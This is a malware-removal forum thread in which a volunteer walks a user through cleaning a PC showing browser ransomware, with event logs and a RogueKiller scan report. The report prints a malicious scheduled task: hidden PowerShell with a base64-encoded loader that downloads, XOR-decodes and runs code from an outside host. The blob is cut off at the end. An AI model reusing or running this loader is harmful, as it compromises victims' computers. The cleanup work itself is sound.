Error: (06/22/2017 05:22:43 PM) (Source: DellUpService.exe) (EventID: 0) (User: )
Description: [5] ERROR- Exception on mounting SOS: mk_dellsupport_lnk can't find DSP! errno=0 #StackInfo#

Error: (06/22/2017 05:22:43 PM) (Source: DellUpService.exe) (EventID: 0) (User: )
Description: [5] ERROR- mk_dellsupport_lnk() can't find DSP! Threw exception! #StackInfo#

Error: (06/22/2017 05:22:43 PM) (Source: DellUpService.exe) (EventID: 0) (User: )
Description: [5] ERROR- FindPartObjects() Lable not matched! TargetELLSUPPORT, Current:Image, PartitionartitionPos {disk:0, part:5}, curGptTypeStr:{de94bba4-06d1-4d40-a16a-bfd50179d6ac} #StackInfo#

Error: (06/22/2017 05:22:43 PM) (Source: DellUpService.exe) (EventID: 0) (User: )
Description: [5] ERROR- FindPartObjects() Lable not matched! TargetELLSUPPORT, Current:WINRETOOLS, PartitionartitionPos {disk:0, part:4}, curGptTypeStr:{de94bba4-06d1-4d40-a16a-bfd50179d6ac} #StackInfo#


System errors:
=============
Error: (06/25/2017 08:13:52 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Windows Presentation Foundation Font Cache 3.0.0.0 service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.

Error: (06/25/2017 08:13:52 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the FontCache3.0.0.0 service to connect.

Error: (06/25/2017 08:13:28 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
and APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (06/25/2017 08:13:28 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
and APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (06/25/2017 08:12:20 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The CldFlt service failed to start due to the following error:
The request is not supported.

Error: (06/25/2017 08:12:21 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 7:00:47 PM on ‎6/‎24/‎2017 was unexpected.

Error: (06/23/2017 07:02:43 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
and APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (06/23/2017 07:02:43 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
and APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (06/22/2017 11:00:38 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
and APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (06/22/2017 11:00:38 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
and APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.


==================== Memory info ===========================

Processor: Intel(R) Celeron(R) CPU N3050 @ 1.60GHz
Percentage of memory in use: 57%
Total physical RAM: 4007.65 MB
Available physical RAM: 1709.14 MB
Total Virtual: 8103.65 MB
Available Virtual: 5461.77 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:455.06 GB) (Free:399.93 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 258D9519)

Partition: GPT.

==================== End of Addition.txt ============================

 

[RichH]

Thank you for helping me fix this.

 

[Broni]

Please, observe following rules:

• Read all of my instructions very carefully. Your mistakes during cleaning process may have very serious consequences, like unbootable computer.
• If you're stuck, or you're not sure about certain step, always ask before doing anything else.
• Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
• Never run more than one scan at a time.
• Keep updating me regarding your computer behavior, good, or bad.
• The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
• If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in malware removal forum.
• I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.

========================================

Ransomware shows in Chrome. Stops when Chrome shut off

Normally, ransomware affects a whole computer, not just some browser.
I need to know what exactly happens.
Some screenshot would be helpful.

Download RogueKiller from one of the following links and save it to your Desktop:

Link 1
Link 2

• Close all the running programs
• Double click on downloaded setup.exe file to install the program.
• Click on Start Scan button.
• Click on another Start Scan button.
• Wait until the Status box shows Scan Finished
• Click on Delete.
• Wait until the Status box shows Deleting Finished.
• Click on Report and copy/paste the content of the Notepad into your next reply.
• RKreport.txt could also be found on your desktop.
• If more than one log is produced post all logs.

Please download Malwarebytes to your desktop.

• Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
• Then click Finish.
• Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
• If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
• When the scan is complete, make sure that all Threats are selected, and click Remove Selected.
• Restart your computer when prompted to do so.
• The Scan log is available throughout History ->Application logs. Please post it contents in your next reply.

Please download AdwCleaner by Xplode and save to your Desktop.

• Double click on AdwCleaner.exe to run the tool.
  Vista/Windows 7/8 users right-click and select Run As Administrator
• The tool will start to update the database if one is required.
• Click on the Scan button.
• AdwCleaner will begin...be patient as the scan may take some time to complete.
• After the scan has finished, click on the Logfile button.
• A window will open which lists the logs of your scans.
• Click on the Scan tab.
• Double-click the most recent scan which will be at the top of the list....the log will appear.
• Review the results...see note below
• After reviewing the log, click on the Clean button.
• Press OK when asked to close all programs and follow the onscreen prompts.
• Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
• After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
• To open a Cleaning log, launch AdwareClearer, click on the Logfile button, click on the Cleaning tab and double-click the log at the top of the list.
• Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
• A copy of all logfiles are saved to C:\AdwCleaner.

-- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name or entry that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on and uncheck any items you want to keep.

Please download Junkware Removal Tool to your desktop.

• Shut down your protection software now to avoid potential conflicts.
• Run the tool by double-clicking it. If you are using Windows Vista or Seven, right-mouse click it and select Run as Administrator.
• The tool will open and start scanning your system.
• Please be patient as this can take a while to complete depending on your system's specifications.
• On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
• Post the contents of JRT.txt into your next message.

 

[RichH]

Normally, ransomware affects a whole computer, not just some browser.
I need to know what exactly happens.
Some screenshot would be helpful.

Thanks Broni.

It may take some time for it to get screen shots as it is behaving OK now. I am helping a friend clean this PC. I thought I had it clean and gave it back to him a few days ago. I removed thousands of bugs. I had to boot to safemode, scan with defender and malwarebytes several times. But 3 days later he said the same ransomware is still on there. When it arrived back here today it was in sleep. Awakened it was showing the login screen, but I could hear the scumbag's voice talking about how to pay the ransom and the danger of not paying, yadayada. After login, the screen was full screen white background, large Ariel font black letters with ransom demand. I escaped from full screen easily, I closed Chrome easily and the sound stopped and it has not started up again yet.

I updated and ran MalwareBytes again today before I contacted you and it found no problems.

I will post screenshot as soon as it happens again, but be patient as I don't know how long it will take to re-emerge again.

In the meantime I will run the 3 applications you recommend.
Thanks
Rich

 

[Broni]

OK

 

[RichH]

RogueKiller V12.11.5.0 (x64) [Jul 3 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 10 (10.0.15063) 64 bits version
Started in : Normal mode
User : Herbert Holland [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Delete -- Date : 07/03/2017 17:56:46 (Duration : 01:11:56)

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 7 ¤¤¤
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-38309054-1687653055-3029875360-1001\Software\System Healer -> Not selected
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-38309054-1687653055-3029875360-1001\Software\System Healer -> Not selected
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-38309054-1687653055-3029875360-1001\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://dell15.msn.com/?pc=DCTE -> Not selected
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-38309054-1687653055-3029875360-1001\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://dell15.msn.com/?pc=DCTE -> Not selected
[Adw.DNSUnlocker] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21d552df-608c-4364-b73f-e63eb3f2a328} | DHCPNameServer : 82.163.143.157 ([GB]) -> Replaced ()
[Adw.DNSUnlocker] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{95685ee5-eeb2-4515-9c5d-b09ee292d1f8} | DHCPNameServer : 82.163.143.157 ([GB]) -> Replaced ()
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{bafee63c-6366-43b0-ae6c-7237f2573316} | DhcpNameServer : 172.91.1.171 ([United States]) -> Not selected

¤¤¤ Tasks : 3 ¤¤¤
[Adw.SystemHealer] \{08047847-0909-087E-0E11-0D090D0D117F} -- C:\WINDOWS\system32\WindowsPowershell\v1.0\powershell.exe (-nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAIAAgADsAIAAgACAAOwA7ACAAIAAgACAAOwAgADsAIAAgACAAIAAgADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABTAFgASwBBAFEARQBGAEQAVgBHAFMAQQAoACQAcAApAHsAJABuAD0AIgBXAGkAbgBkAG8AdwBQAG8AcwBpAHQAaQBvAG4AIgA7AHQAcgB5AHsATgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewAgAH0AdAByAHkAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABwACAALQBOAGEAbQBlACAAJABuACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0AVgBhAGwAdQBlACAAMgAwADEAMwAyADkANgA2ADQAfABPAHUAdAAtAE4AdQBsAGwAOwB9AAoAYwBhAHQAYwBoAHsAdAByAHkAewBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABwACAALQBOAGEAbQBlACAAJABuACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsACgB9ADsAfQAKAH0AUwBYAEsAQQBRAEUARgBEAFYARwBTAEEAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAUwBYAEsAQQBRAEUARgBEAFYARwBTAEEAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiACkAOwBTAFgASwBBAFEARQBGAEQAVgBHAFMAQQAoACIASABLAEMAVQA6AFwAQwBvAG4AcwBvAGwAZQBcAHQAYQBzAGsAZQBuAGcALgBlAHgAZQAiACkAOwAKACQAcwB1AHIAbAA9ACIAaAB0AHQAcAA6AC8ALwBlAGEAcwB5AHAAbwBwAC4AaQBuAGYAbwAvAHUALwA/AGEAPQBkADAAbQBWAHAAeQBWADcAMwB5ADAAdwBjAGoAbgBSADQAWABuAHoAQQBTAGwAZwBhAGkAVgBFAE0AUQBuAFMARABCAFkATAA2AFoAcgBrADEAVABCAFUAeABCADYAUgBMAG8AbABUADEATgBnAEIARQA1ADUATwA1AGEAOAByADcARQBpADkAYgBWAG0AOAA1AGMAcgBPAFoAbgA3AFIASwBiAHEAVgBTAHYAcABDAEIAOABlAEYARwBFAFYAZABtAHAARwAyAGEAcQBXAFMAMABtAEkARQBhAE8AbgBFAGMAQQB0AEIAOQBiAEMAdgAtAGkAUgBTAHIAOABRADkAVQBnAG8AYQA5AG0AVABYAHgARgBjAEYAcAA1AG8AbQBvADMAUAB0AG4ASgBSAE8AOABrAEIANQBMAFIAQgBrADYAVABvAEMAagBHAFYAXwBRAC0AYQB2AG4ASAB0AG8AQwBuADEAcQBTAEQAZAA1AFIAagBiAGwATQAyADkAWgA5AHYAMQB4AGgAQQBPADgASQB2AGkARABYAHIAXwBMAEQAZwBNAEEARgBsAHAATgBFAEEAdwA5AEkAcgBRAEEASwBMAFMAaQA2AEYASgBjAHMASABnAFAAbQBUAGEASQBuAGsAawBaAFcAWgBsAC0AUgBnADMANgBmAEwAUQBQAGoAUwA0ADEANQB5AE8AQgB5AFQAZABQAC0ASQB1AFAAMQBZAHUAVABFAHEAUgBzAG8AXwBsAHgAWgBvADYAagA3AEwAZABTAEQATQBCAGYANQBHAFgANAB5ADUATgByAGMAMgBQAEcAegBuAHgALQBOAEgAQgBKAEMAWgBqADUAbwBwAFcAZQB6AGQAZwBRAFAARwBxAFUAWgBXAFEATQBtAHQAbQBjAEQAcABzAEwAYwBMAGoAQwBCAHcAbQBPAFEAUwB6AEYAOABYADIAXwBEAFcAdABUAEIAcgBZAGcAawBvAEEAZQBrAFYAawA5AHcARQBLAFcASQBQAEUAZwBPAFcARwAxAFcAcABRAG8AbwB6ADcAOQBmAFIAegB5AGkAcQByADUAYgBHAGQAUAA5AG0AMQA3AGEAYQBiAHYAMABmAEsANgBXAEcAQQB6AG0AdgA1ADAAZQAxAHIAeQA5ADMAbQAyADUASABuAGMAZQBHADIATwA2AFQAbABGAFQAMgBhAFQAcgBCAGgAXwB2AGkAbABUAFEASgBXAEMAaQBvAFIAUwB0AFMAQgAxADUAawBnADEAZwBLAEIARABBADEAbQB2AEYAdQBvADgAcgA1AEYAdwBaAEUAVQA3AE0AYwAzAEcAagBtAHgAZAA4AFEAOABfAG4AOABJAHEAdwB3AEgANABNAGwAdwBzAGUAdgAtAGgAVQBrADcANwBBAEkATQB5ADkAeAA0ADMAWABTAHYAQQBIADMAaQBMAG0AbgBvAGEAegBDAG0AdQBMAE8ASwA1AFIAdwBtAGsAQwBYAHMAOQBGAEEAeAAxAHMAdwBYADkASwB1AHgAYQBoAHYASwBjAGcAeQBUAFQAQQBNAFgAeABhAEYAVwBoAG4AYwBlAGkANwBXAFcAcgBUADgAYwBZAG8ANwB1AEwAUABKAC0AWgBtAHQASQBNAF8ATwAzAGUAMABSAHMAbABSAGIAZwB0AE4AdQBCAGkAMABvAGcAMwA2AHoASQBkAFIAMgBIAHIAZwBiAHYAbABDAFIAbgBZAFcAQgBpAGcARwAtAEcAMAA5AEUAZQAwAEwAdQBuAEkAdwBZAGYASwBOAHAARwBLAFoAYQBCAGkAVQBjAFAANQBVAGMAZwBvAHIAQwA3ADcATwBWAEoAZAA0AHkAXwBMAGUATQBhAHgAUgBPAFcAOAAwAGMANwBDAFQAWAA1AHgAawBPAGgANwB5AGkAWAA4AGEAYgB4AFYAWQBMAHUANAA2AG8AMgAxAHYATAA5AE8ASwBIAGsAVwBEAFIARwB3AFUAbgB1AHQAdgBNAGgAXwBjAHoAUgAxAFYANwBiAGMAUgBCAFQAVQB4AG4AYwB3AHkAMABQAHcATgBXAC0ANgBGAG4AcwBnAEUAYwB0AG4AZABNAGwAaQAtAEcARgBxAGsAdwBxAEwAagBtAE8ARQAwAEUAawBXAGgAXwBTADYAVQBhAHgAeABqAFMAUABQADEAdgBJAGUAdQBVAGYAaAB1AEgAcQBBAGYASwAtAFUATwBVAGEANQAzAEoAbgAzAF8ANQBTAHoAMQBFAGkAWQBHAG0AcwBWAGYAaQBaAHMAUQBfAE0ASQBCAEsAagBrAC0AbABPADMARwBHAGUAcgBtAFMASAAzAGwAdwBHADAAbwBxAEMANgBmAFEAVgA1AHgAMgBQAHkAVgA4AGcAYwB5AHYAdAAyAEUAYQBQAEgATwB1AGoAUwA4AHgAUgBCAFoAUQBhAGEASABTAFgAUQAyAGkAYwBJAEEAXwBXAGoAYQBqAE4ARQBtAGQAdgB6AGcAUQBIAEIAawBDAEQAdQBWAEMATQA2AGsAXwBiAFUAeABjADAAdQBRAEIAUAAtAGoAUgBfAGoAUgBLADYAWgA5AGcAOABEAEkAZQBCAE4AZwBDADIAbABUAEMAcwBYAG8AVwBYAGkANABoAFEASgBCAGQASAA5AGoAdQBNAGoAZABfAE4AcQA4AHMARABzAEkAMQBuAEQASgBYADMAWgA5AEoAeQBiAEIASQBUAGMAaQBrADYAYgByAGMARgBoADkARgAmAGMAPQBjAEEAcAAyADQAdwByAHcAWgBpAGkAVgAtAHgAUgBzAE4AagAwADUAbwBTAGcATwA5AGgAagA4AEMAawBOADAAUABkAGoAagBuAEcAUAB3ADIAbgBrAGoATwBFAEoASQBhADMAbQBoAGwAMQBLAEcAaAByAEgARgB5AHUAVAAtAEkAcgAyAFQASQBGADMAcQBhADQATQAyAEgAZwBuAHcAcgBZAFUARwAxAEcANgBZAG0AMQBaAEMAUwBLAGkAaABmADQAeABTAGsAVQBUAE4AagA0AGEATQBuAHIAVAAtAGYATABqAFAASABxAHYAMQBwAEoAOABNAHIAdABZAG8AYwBMAHUAbgBFAEUAagA4AGkAcgBWAEsAdABkAGQAQwBjAFUAMQBtAGgALQBuADkAOAB0AEkAbAAwADcAZQA3AHEAZAB0AEEAUABIADQAQQBiAEcAYQBuAHQAbgBNAHgAVAB3ADcAWgB1AFkAawAxAEMAcgBjAHgAUwB4AGsAYgBwAFoAYgByAE8AVgBNAG0ATgBDAEUAagAwAHcARgBlAEYAZwB2AFAATgBlADAAdgBsAEoAQQBzADMAQwBwADAAUwB6ADYAOABYAEgAagBXAFUAawA4AGgANgBiAGoANgBHAG4AdQB0AFgASwAzAGMAVwBEAFIASwBaAGQASgBSAF8AdwA4AGEANAA3AHAAWABuAEQAbABpAFQAYgBYAFQATABJAGUAYwA2AHcAQQBVAEMAUABmAEcAeQBzAFEAVQBzAHAAZgBHADQAOQBGAFYATgBsADAAWQAxAHUANwBtAFUAVQBiAFkATAAzAGUARgBEAEMAZQAzAEgAUQAwAHYAaABDAE8AdQB6ADgAeQBPAFcASgAxAFAAUwA3AEoAUgBSAGUATQBzADUATAB3AHUAWQBTAEEAbAAxAFcARQBPADIAdgBKAGUAYwB1AFQAbQAyAF8AZwA0AHYAcQBkADUASAA3AGwAOQBtAHIAYQBQAGYAWQBDAFoAeABiAEMASgBqAEIAZwAzAG0ATQB5AHgARgBaADQANQA2AGoAVwBjAC0AZgB5AGEAeABlAEsARAAzADcAdgBiAFIAOQBOADMAUQB0AF8AcQBNAHIATgBJADQARgBlAGsAMQAwAEgAYQBNAFMASABLAFoAUABoAEEAZwBnAFAAWQBrAG8AYwBJADIANQBTAGYAdwBjAFQAaQBmAGMAOQAwAFgAdwBEAE4AcAB4AHEAcgAxAGYASwBEAEwAMwBRAFQAMQBEAHQAaQBMAHYAeQA2AEQAcABxAEcAcwBzADgASwBEADUARABJAEUAeABMAHcANQB3AEcARgBSAHUASwBRAEMAUABJADkAcwAzAEoAXwBmAHUAWQBUADIAVgBIAGEANABDAHoATgAxAHIAYwB1AFEAQgBFAEMAYQBJADEARgBNAEsAYQBNAHIAWQBPAHAAOABMADcAcgBqAHMAdABaAFAAZABXAGoAUQBZAHUAZAB0AHIAMgB5AGgASgBVAGUAbwBSADkAbABCAHIAbgBKADQANwBqAE4AYwByAGEARQBmAFYASAAyAFcARQBpAGMAQgAxAFIANwBvAG8AcgBKAGYARwBZAFEAZgBDAFAASAB6AEMAWgBzAHYAYgBUAFAAUAA2AGcAbgBzAFoALQBNAFkARwB4AFQAZgBuAHAANQA1ADUAawBlAGQAZAA0AEwALQBTAGkAOQBBAHQAOQBBAG4AaABOAHUAaABGAHEAZQBFAGcAZwBYADAAYQBQAGIANgBnADUAUQBTAEIAOQBUAGQAZgAtAEkAagBwAFcAZwAwAGwAMwBhAE0ASAB3AHcARwBzAGsATQBqAEgARQBwADgASQB4AG8ARgBEAGMAdQBaAG4AYQA2AHUAUwBKAFoAZwBUAFIAeABRAFEAdQBxAGsAeQBiAFMARQB6AEEAWQBpAEQAQwBOAG4AbgBDAEYAagBRAEkAcQA4ADIAeABYAGEASwBWAEUANwBvAE0AUwA1AE4AYQBZAC0AdwBPAHAAOABUADYAWQBVADIAcgA1AEEASABtADcAcABxAFkALQBWAGsASgBNAHQAbQB0AGQAOABtAFcAUAB1AEUAawB6AEkAcQBVAHMAUwBrAGoATABqAEUAawB5AGsAOAAwAEoAdwA4ADEAQwB6AEQAQgByAEIAawB3AEIAbgBkADIAUgBxADUAeABfAG4AQQBxAEsASgBXAHUAbABQAG0AcgAxAFcAcwA3ADgANQBBADcASwBrAHEAcABhAG0AcwBTADIAdgBVADQAQQAzAFEAYwA0AGUAWQBJAHAAeQBGADgASwBOADYAaABSADkAMAA2AHAAUwBOAEwAdwBTAEwAMgA0AGcAYQAtAEsAegBEAE8AUgBhAE8AcQBDAGQAaQBfAFkAZAB3AFQAYwBMAGMAZwBfACYAcgA9ADQAOQA4ADcAOQAwADMANAAxADkAMgAwADMANAA5ADkAMQAxADcAIgA7ACQAcwB0AHMAawA9ACIAewAwADgAMAA0ADcAOAA0ADcALQAwADkAMAA5AC0AMAA4ADcARQAtADAARQAxADEALQAwAEQAMAA5ADAARAAwAEQAMQAxADcARgB9ACIAOwAkAHAAcgBpAGQAPQAiAFMAeQBzAHQAZQBtAEgAZQBhAGwAZQByACIAOwAkAGkAbgBpAGQAPQAiAEYASABRAEcAUABFAEMARAAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQA7AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwAgAH0ACgBmAHUAbgBjAHQAaQBvAG4AIABaAFIASQBWAEwASQBaAEMAVwBaAEYATABYAEYAQgAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsACgB9AAoAZgB1AG4AYwB0AGkAbwBuACAAUgBRAEIAWgBKAEQAQwAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwAgAH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG